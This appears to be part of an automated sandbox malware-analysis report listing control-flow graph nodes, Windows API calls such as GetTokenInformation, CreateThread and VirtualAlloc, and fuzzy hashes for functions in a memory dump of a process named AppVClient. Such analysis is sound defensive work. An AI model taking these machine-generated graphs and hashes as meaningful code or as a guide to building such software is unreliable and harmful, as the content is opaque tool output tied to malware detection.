                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 0 be81c0-be81d8 1 be83bf-be83ca 0->1 2 be81e5 0->2 16 be8277-be827a 1->16 17 be83d0 1->17 3 be81eb 2->3 4 be82a3-be82a5 2->4 5 be82b2-be82bc 3->5 6 be81f1 3->6 7 be82ab 4->7 8 be83f9 4->8 14 be8357-be836f GetTokenInformation 5->14 15 be82c5-be82c8 5->15 6->5 10 be81f7-be828e 6->10 7->8 13 be82b1 7->13 11 be83ff 8->11 12 be82d2-be82d7 8->12 21 bef524-bef52e 11->21 22 be8306-be8309 12->22 13->5 29 be8376-be837b 14->29 15->8 24 be82ce 15->24 19 be827c 16->19 20 be8241 16->20 17->16 23 be83d6 17->23 19->20 25 be827e 19->25 20->29 30 be8251-be8256 call c172f4 20->30 26 bef807 21->26 27 be832e-be8330 22->27 28 be830b-be8311 CloseHandle 22->28 31 be828f-be8303 call c172ec 24->31 32 be82d0 24->32 25->28 36 be8284 25->36 33 bef8df-bef8e0 26->33 34 bef80d 26->34 38 be82dd-be82e3 27->38 39 be8332 27->39 28->27 40 be82f0-be831c 29->40 41 be8381 29->41 45 be825b-be8260 30->45 31->22 55 be834f-be8355 31->55 32->12 32->31 53 bf15a5-bf15aa 33->53 34->33 43 bef813 34->43 36->27 47 be82e9 38->47 48 be83a3-be83a4 38->48 39->38 46 be8334 39->46 40->2 61 be8322 40->61 41->40 49 be8387 41->49 57 bef78f 43->57 58 bef81b 43->58 50 be8390-be8393 45->50 46->21 47->48 54 be82ef 47->54 48->21 49->16 49->50 50->25 60 be8399 50->60 59 bf15ae-bf15af 53->59 54->40 67 be8212-be821a GetTokenInformation 55->67 68 be8341 55->68 57->58 63 bef795 57->63 58->33 64 bf15b2-bf15b7 59->64 60->25 65 be839f-be83a1 60->65 61->2 66 be8328-be832c 61->66 63->26 69 bf15ba-bf15c1 64->69 65->48 66->15 66->27 73 be83af 67->73 74 be8220-be8234 67->74 68->67 72 be8347 68->72 70 bf15c7-bf15d2 69->70 71 bf1750-bf17a2 call c172f4 69->71 76 bf15d4-bf15d6 70->76 77 bf1620-bf1623 70->77 80 be834d 72->80 81 bf1638-bf1640 72->81 73->30 79 be83b5 73->79 102 be823a 74->102 103 be83d7-be83dd 74->103 83 bf15dc-bf15df 76->83 84 bf1670-bf1684 76->84 85 bf1625-bf1628 77->85 86 bf16a0-bf16b4 77->86 79->30 87 be83bb-be83bd 79->87 80->55 88 bf170e-bf1727 81->88 89 bf1646-bf165f 81->89 83->69 92 bf15e1-bf15f6 83->92 84->53 97 bf168a-bf168d 84->97 85->69 94 bf162a-bf1636 85->94 90 bf16b6-bf16b9 86->90 91 bf16f4-bf16f5 86->91 87->1 88->70 95 bf172d 88->95 89->70 96 bf1665 89->96 98 bf16bb 90->98 99 bf173a-bf173b 90->99 108 bf16fe-bf170c 91->108 100 bf15fc-bf1600 92->100 101 bf16d2-bf16d7 92->101 94->81 104 bf16dc-bf16ec 94->104 95->71 96->71 105 bf172f-bf1738 97->105 106 bf1693-bf1697 97->106 107 bf16bf-bf16cd 98->107 112 bf173f-bf1740 99->112 100->108 109 bf1606-bf1618 100->109 101->59 102->103 111 be8240 102->111 103->8 104->70 110 bf16f2 104->110 105->112 106->107 114 bf1744-bf1748 108->114 109->64 110->71 115 bfb32e-bfb330 111->115 112->114 116 bfb332-bfb337 call c172f4 115->116 117 bfb300 115->117 116->117 123 bfb339 116->123 121 bfb2fd 117->121 122 bfb302 117->122 124 bfb2ff 121->124 125 bfb305 121->125 123->117 126 bfb33b-bfb33f 123->126 127 bfb308-bfb315 124->127 125->127 128 bfb322-bfb32d 125->128 126->127 127->125 130 bfb317 127->130 128->115 130->121
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2171060482.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_be0000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 036b26a6c0b06b3b0a06e6d5b9989b850615622d383eb13a84cc5e27f560993c
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58B1133050CE89CBCB29CB1E84C0675B7E2FFA5314F288AD9D58F87166DF259C069356
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00BE5B8F Relevance: 4.7, APIs: 3, Instructions: 161threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 131 be5b8f-be5c20 call bf53f0 call c18358 call c00320 call be81c0 141 be5c26 131->141 142 be5cf4-be5d08 call c172ec 131->142 141->142 143 be5c2c-be5c2f 141->143 146 be5d0e 142->146 147 be5c87-be5dc8 call be5e60 call be5990 142->147 146->147 149 be5d14-be5d18 146->149 159 be5dcd 147->159 153 be5daf-be5db6 call be52d0 149->153 154 be5c65 149->154 165 be5dbc 153->165 166 be5c30-be5c39 153->166 156 be5c67 154->156 157 be5ca3 call be5df0 154->157 156->157 161 be5c69-be5c9d 156->161 170 be5c45-be5d6d call c01520 157->170 159->159 179 be5c9f 161->179 180 be5c85 161->180 167 be5dbe 165->167 168 be5d7d-be5d89 165->168 182 be5cb9-be5cbd 166->182 183 be5bf7 166->183 167->168 178 be5d9b 167->178 176 be5d8b-be5d92 168->176 177 be5d94 168->177 188 be5bfd-be5c06 170->188 193 be5d73 170->193 176->177 184 be5d9c 176->184 177->143 191 be5cb3 177->191 178->184 179->180 186 be5ca1 179->186 180->147 189 be5d56-be5d5b CreateThread 182->189 190 be5cc3 182->190 183->182 183->188 196 be5da5-be5da8 184->196 186->157 188->196 198 be5c7e 189->198 199 be5d1f-be5d45 189->199 190->189 194 be5cc9 190->194 191->143 191->182 193->188 195 be5d79-be5d7b 193->195 194->189 195->168 196->153 198->199 200 be5c84 198->200 202 be5d47 199->202 203 be5cd4-be5cea CreateThread CloseHandle 199->203 200->180 202->203 203->176 204 be5cf0-be5d4d 203->204 204->177
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2171060482.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_be0000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b3df3db0ec98d26e75dd1d0808baf16946a2a4e042701f1afc4b96da02630d7d
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C41F620208FC98FCB789B3B8CA9B7926D0EB5531CF3841F6D006CB2A2DF648C459752
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00BE5D22 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 207 be5d22-be5d45 208 be5d47 207->208 209 be5cd4-be5cea CreateThread CloseHandle 207->209 208->209 210 be5d8b-be5d92 209->210 211 be5cf0-be5d4d 209->211 214 be5d9c 210->214 215 be5d94 210->215 211->215 217 be5da5-be5db6 call be52d0 214->217 218 be5c2c-be5c2f 215->218 219 be5cb3 215->219 231 be5dbc 217->231 232 be5c30-be5c39 217->232 219->218 220 be5cb9-be5cbd 219->220 222 be5d56-be5d5b CreateThread 220->222 223 be5cc3 220->223 228 be5c7e 222->228 229 be5d1f-be5d45 222->229 223->222 226 be5cc9 223->226 226->222 228->229 230 be5c84-be5dc8 call be5e60 call be5990 228->230 229->208 229->209 250 be5dcd 230->250 233 be5dbe 231->233 234 be5d7d-be5d89 231->234 232->220 243 be5bf7 232->243 233->234 242 be5d9b 233->242 234->210 234->215 242->214 243->220 245 be5bfd-be5c06 243->245 245->217 250->250
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2171060482.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_be0000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: bd8229d4424fd939103259ef4c70bae2da1defa8dffe16065419f7eb42f8be68
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EFF0C220618EC585DA3C863B8CA977A61C1EB9932CF7487EA9117C92D0DF6449019306
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00BE5D50 Relevance: 1.5, APIs: 1, Instructions: 8threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 251 be5d50-be5d5b CreateThread 252 be5c78 251->252 253 be5c7e 252->253 254 be5d1f-be5d45 252->254 253->254 255 be5c84-be5dc8 call be5e60 call be5990 253->255 258 be5d47 254->258 259 be5cd4-be5cea CreateThread CloseHandle 254->259 276 be5dcd 255->276 258->259 260 be5d8b-be5d92 259->260 261 be5cf0-be5d4d 259->261 265 be5d9c 260->265 266 be5d94 260->266 261->266 271 be5da5-be5db6 call be52d0 265->271 272 be5c2c-be5c2f 266->272 273 be5cb3 266->273 283 be5dbc 271->283 284 be5c30-be5c39 271->284 273->272 275 be5cb9-be5cbd 273->275 278 be5d56-be5d5b CreateThread 275->278 279 be5cc3 275->279 276->276 278->252 279->278 281 be5cc9 279->281 281->278 285 be5dbe 283->285 286 be5d7d-be5d89 283->286 284->275 292 be5bf7 284->292 285->286 291 be5d9b 285->291 286->260 286->266 291->265 292->275 293 be5bfd-be5c06 292->293 293->271
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2171060482.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_be0000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 2634cf9c3c49d0300d36e19ba68c94492cb2b79f25b1ba20186cbafe9a43b30c
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBB01200429FC765003913330E8852805C4EF4633CD746FFC8F7306AD2DB000C046320
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00BE5990 Relevance: 1.4, APIs: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 295 be5990-be599b 297 be5a33-be5a61 call c19b00 295->297 298 be59a1 295->298 306 be5ab4-be5aba call c01080 297->306 307 be5a63 297->307 298->297 300 be59a7-be59ab 298->300 304 be5a59 300->304 305 be59b1-be59f3 call c12320 300->305 309 be5a5b 304->309 310 be5a25-be5a2d 304->310 305->304 325 be59f5-be59fa 305->325 328 be5a83-be5a88 call be5df0 306->328 331 be5a13 306->331 307->306 311 be5a65 307->311 309->310 319 be5a23 309->319 313 be5a2f 310->313 314 be5a70-be5a7b 310->314 311->314 313->311 317 be5a7d 314->317 318 be5a16-be5a1e call c01470 314->318 317->318 323 be5a7f-be5a81 317->323 332 be5a96-be5ac2 318->332 324 be5a24 319->324 323->328 329 be59fc 325->329 330 be5a51-be5a54 call c1233c 325->330 337 be5a8d VirtualAlloc 328->337 329->330 334 be59fe-be5a02 329->334 330->304 331->328 336 be5a15 331->336 332->324 339 be5ac8 332->339 334->330 336->318 337->332 339->324 340 be5ace 339->340 340->297
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2171060482.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_be0000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 1284135714-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7cc8892d78a23b370e97d92c96cac4a2189f72fbc8b1eedb70e93b1b971a2c1f
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A21E63451DEC88FC77A932B44D52B926E2FB9932CF5823FBD086CB193DB284D059242
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00BE8245 Relevance: 1.3, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 342 be8245-be8247 343 be824d-be824f 342->343 344 be82d2-be82d7 342->344 345 be8251-be8260 call c172f4 343->345 346 be8306-be8309 344->346 353 be8390-be8393 345->353 348 be832e-be8330 346->348 349 be830b-be8311 CloseHandle 346->349 351 be82dd-be82e3 348->351 352 be8332 348->352 349->348 355 be82e9 351->355 356 be83a3-be83a4 351->356 352->351 354 be8334 352->354 359 be827e 353->359 360 be8399 353->360 357 bef524-bef52e 354->357 355->356 358 be82ef 355->358 356->357 362 bef807 357->362 366 be82f0-be831c 358->366 359->349 361 be8284 359->361 360->359 363 be839f-be83a1 360->363 361->348 364 bef8df-bef8e0 362->364 365 bef80d 362->365 363->356 370 bf15a5-bf15aa 364->370 365->364 368 bef813 365->368 375 be81e5 366->375 376 be8322 366->376 372 bef78f 368->372 373 bef81b 368->373 374 bf15ae-bf15af 370->374 372->373 377 bef795 372->377 373->364 378 bf15b2-bf15b7 374->378 379 be81eb 375->379 380 be82a3-be82a5 375->380 376->375 381 be8328-be832c 376->381 377->362 382 bf15ba-bf15c1 378->382 385 be82b2-be82bc 379->385 386 be81f1 379->386 388 be82ab 380->388 389 be83f9 380->389 381->348 387 be82c5-be82c8 381->387 383 bf15c7-bf15d2 382->383 384 bf1750-bf17a2 call c172f4 382->384 391 bf15d4-bf15d6 383->391 392 bf1620-bf1623 383->392 385->387 396 be8357-be836f GetTokenInformation 385->396 386->385 393 be81f7-be828e 386->393 387->389 397 be82ce 387->397 388->389 395 be82b1 388->395 389->344 394 be83ff 389->394 399 bf15dc-bf15df 391->399 400 bf1670-bf1684 391->400 402 bf1625-bf1628 392->402 403 bf16a0-bf16b4 392->403 394->357 395->385 412 be8376-be837b 396->412 404 be828f-be8303 call c172ec 397->404 405 be82d0 397->405 399->382 408 bf15e1-bf15f6 399->408 400->370 411 bf168a-bf168d 400->411 402->382 410 bf162a-bf1636 402->410 406 bf16b6-bf16b9 403->406 407 bf16f4-bf16f5 403->407 404->346 433 be834f-be8355 404->433 405->344 405->404 413 bf16bb 406->413 414 bf173a-bf173b 406->414 424 bf16fe-bf170c 407->424 415 bf15fc-bf1600 408->415 416 bf16d2-bf16d7 408->416 418 bf16dc-bf16ec 410->418 419 bf1638-bf1640 410->419 420 bf172f-bf1738 411->420 421 bf1693-bf1697 411->421 412->366 422 be8381 412->422 423 bf16bf-bf16cd 413->423 430 bf173f-bf1740 414->430 415->424 425 bf1606-bf1618 415->425 416->374 418->383 426 bf16f2 418->426 428 bf170e-bf1727 419->428 429 bf1646-bf165f 419->429 420->430 421->423 422->366 431 be8387 422->431 434 bf1744-bf1748 424->434 425->378 426->384 428->383 435 bf172d 428->435 429->383 436 bf1665 429->436 430->434 431->353 432 be8277-be827a 431->432 437 be827c 432->437 438 be8241 432->438 440 be8212-be821a GetTokenInformation 433->440 441 be8341 433->441 435->384 436->384 437->359 437->438 438->345 438->412 443 be83af 440->443 444 be8220-be8234 440->444 441->440 442 be8347 441->442 442->419 447 be834d 442->447 443->345 446 be83b5 443->446 451 be823a 444->451 452 be83d7-be83dd 444->452 446->345 448 be83bb-be83ca 446->448 447->433 448->432 457 be83d0 448->457 451->452 453 be8240 451->453 452->389 456 bfb32e-bfb330 453->456 458 bfb332-bfb337 call c172f4 456->458 459 bfb300 456->459 457->432 460 be83d6 457->460 458->459 466 bfb339 458->466 464 bfb2fd 459->464 465 bfb302 459->465 467 bfb2ff 464->467 468 bfb305 464->468 466->459 469 bfb33b-bfb33f 466->469 470 bfb308-bfb315 467->470 468->470 471 bfb322-bfb32d 468->471 469->470 470->468 473 bfb317 470->473 471->456 473->464
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2171060482.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_be0000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b0dff9d79f241462290ca9b30aeeda37e63e2950338b3ab4c1643f9d89a32e26
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b5c3f705f9c07e18e9fed4425a8b847f59da5c944a15ebbd2a3689b4522c0a5
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91F0A43450DED2CFD62A871B909043A6BE1EF91710B6901DAE48FCB552CF14DC06E752
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00BE83E7 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 605 be83e7-be83e9 606 be83ef 605->606 607 be82c5-be82c8 605->607 606->607 608 be83f5-be83f7 606->608 609 be82ce 607->609 610 be83f9 607->610 608->610 613 be828f-be8303 call c172ec 609->613 614 be82d0 609->614 611 be83ff 610->611 612 be82d2-be82d7 610->612 616 bef524-bef52e 611->616 617 be8306-be8309 612->617 613->617 628 be834f-be8355 613->628 614->612 614->613 619 bef807 616->619 620 be832e-be8330 617->620 621 be830b-be8311 CloseHandle 617->621 622 bef8df-bef8e0 619->622 623 bef80d 619->623 625 be82dd-be82e3 620->625 626 be8332 620->626 621->620 634 bf15a5-bf15aa 622->634 623->622 627 bef813 623->627 630 be82e9 625->630 631 be83a3-be83a4 625->631 626->625 629 be8334 626->629 638 bef78f 627->638 639 bef81b 627->639 636 be8212-be821a GetTokenInformation 628->636 637 be8341 628->637 629->616 630->631 635 be82ef 630->635 631->616 640 bf15ae-bf15af 634->640 646 be82f0-be831c 635->646 642 be83af 636->642 643 be8220-be8234 636->643 637->636 641 be8347 637->641 638->639 644 bef795 638->644 639->622 645 bf15b2-bf15b7 640->645 651 be834d 641->651 652 bf1638-bf1640 641->652 649 be83b5 642->649 650 be8251-be8256 call c172f4 642->650 676 be823a 643->676 677 be83d7-be83dd 643->677 644->619 653 bf15ba-bf15c1 645->653 672 be81e5 646->672 673 be8322 646->673 649->650 656 be83bb-be83ca 649->656 666 be825b-be8260 650->666 651->628 658 bf170e-bf1727 652->658 659 bf1646-bf165f 652->659 654 bf15c7-bf15d2 653->654 655 bf1750-bf17a2 call c172f4 653->655 661 bf15d4-bf15d6 654->661 662 bf1620-bf1623 654->662 695 be8277-be827a 656->695 696 be83d0 656->696 658->654 667 bf172d 658->667 659->654 668 bf1665 659->668 670 bf15dc-bf15df 661->670 671 bf1670-bf1684 661->671 674 bf1625-bf1628 662->674 675 bf16a0-bf16b4 662->675 678 be8390-be8393 666->678 667->655 668->655 670->653 683 bf15e1-bf15f6 670->683 671->634 688 bf168a-bf168d 671->688 681 be81eb 672->681 682 be82a3-be82a5 672->682 673->672 684 be8328-be832c 673->684 674->653 685 bf162a-bf1636 674->685 679 bf16b6-bf16b9 675->679 680 bf16f4-bf16f5 675->680 676->677 686 be8240 676->686 677->610 689 be827e 678->689 690 be8399 678->690 700 bf16bb 679->700 701 bf173a-bf173b 679->701 711 bf16fe-bf170c 680->711 702 be82b2-be82bc 681->702 703 be81f1 681->703 682->610 704 be82ab 682->704 691 bf15fc-bf1600 683->691 692 bf16d2-bf16d7 683->692 684->607 684->620 685->652 694 bf16dc-bf16ec 685->694 706 bfb32e-bfb330 686->706 697 bf172f-bf1738 688->697 698 bf1693-bf1697 688->698 689->621 693 be8284 689->693 690->689 699 be839f-be83a1 690->699 691->711 712 bf1606-bf1618 691->712 692->640 693->620 694->654 716 bf16f2 694->716 709 be827c 695->709 710 be8241 695->710 696->695 713 be83d6 696->713 719 bf173f-bf1740 697->719 714 bf16bf-bf16cd 698->714 699->631 700->714 701->719 702->607 718 be8357-be836f GetTokenInformation 702->718 703->702 715 be81f7-be828e 703->715 704->610 717 be82b1 704->717 707 bfb332-bfb337 call c172f4 706->707 708 bfb300 706->708 707->708 729 bfb339 707->729 726 bfb2fd 708->726 727 bfb302 708->727 709->689 709->710 710->650 722 be8376-be837b 710->722 724 bf1744-bf1748 711->724 712->645 716->655 717->702 718->722 719->724 722->646 728 be8381 722->728 731 bfb2ff 726->731 732 bfb305 726->732 728->646 730 be8387 728->730 729->708 733 bfb33b-bfb33f 729->733 730->678 730->695 734 bfb308-bfb315 731->734 732->734 735 bfb322-bfb32d 732->735 733->734 734->732 737 bfb317 734->737 735->706 737->726
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2171060482.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_be0000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 89cd4901a5116b745feb72b5d575a6ab32fe4d4f24b36e33d2a2a060cec7c5ad
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07F0903450CDC2CB8A3A8617D48093627E1EB61700B6C40D9D54ECB162CF24DC01E75A
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00BE8318 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
